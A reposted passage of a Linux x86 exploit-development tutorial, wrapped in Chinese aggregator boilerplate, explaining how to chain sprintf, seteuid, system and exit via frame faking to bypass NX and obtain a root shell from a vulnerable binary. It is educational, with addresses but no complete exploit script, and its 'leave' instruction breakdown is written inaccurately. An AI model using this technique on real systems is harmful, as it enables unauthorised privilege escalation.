linux(x86) exploit 开发系列5:使用ret2libc链绕过NX

Posted

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了linux(x86) exploit 开发系列5:使用ret2libc链绕过NX相关的知识,希望对你有一定的参考价值。

A simple way to chain multiple libc functions is to place one libc function address after another in the stack, but its not possible because of function arguments.

chaining seteuid, system and exit would allows us to exploit the vulnerable code ‘vuln’. But is not a straight forward task because of below two problems:

1 只能有一个函数覆盖到返回地址上

2 seteuid的参数是0,strcpy会截断

 

Problem 1: To address this problem Nergal talks about two brilliant techniques

  1. ESP Lifting
  2. Frame Faking

Here lets see ONLY about frame faking since to apply esp lifting technique binary should be compiled without frame pointer (-fomit-frame-pointer) support. But since our binary (vuln) contains frame pointers, we need to apply frame faking technique.

 

Frame Faking?

In this technique instead of overwriting return address directly with libc function address (seteuid in this example), we overwrite it with “leave ret” instruction. This allows the attacker to store function arguments in stack without any overlap and thus allowing its corresponding libc function to be invoked

 

How a leave ret instruction invokes a libc function above it?

To know the answer for the above question, first we need to know about “leave”. A “leave” instruction translates to:

mov ebp,esp            //esp = ebp
pop ebp                //ebp = *esp

 

Problem 2: In our case seteuid_arg should be zero. But since zero being a bad character, how to write zero at stack address 0xbffff210? There is a simple solution to it, which is discussed by nergal in the same article. While chaining libc functions, first few calls should be strcpy which copies a NULL byte into seteuid_arg’s stack location.

NOTE: But unfortunately in my libc.so.6 strcpy’s function address is 0xb7ea6200 – ie) libc function address itself contains a NULL byte (bad character!!). Hence strcpy cant be used to successfully exploit the vulnerable code. sprintf (whose function address is 0xb7e6e8d0) is used as a replacement for strcpy ie) using sprintf NULL byte is copied in to seteuid_arg’s stack location.

Thus following libc functions are chained to solve the above two problems and to successfully obtain root shell:

sprintf | sprintf | sprintf | sprintf | seteuid | system | exit

以上是关于linux(x86) exploit 开发系列5:使用ret2libc链绕过NX的主要内容,如果未能解决你的问题,请参考以下文章

linux(x86) exploit 开发系列3:off-by-one

linux(x86) exploit 开发系列4:使用return2libc绕过NX

SploitFun Linux x86 Exploit 开发系列教程

linux(x86) exploit 开发系列6:使用return-to-plt绕过ASLR

Linux (x86) Exploit 开发系列教程之六(绕过ASLR - 第一部分)

Linux (x86) Exploit系列之三 Off-By-One 漏洞 (基于栈)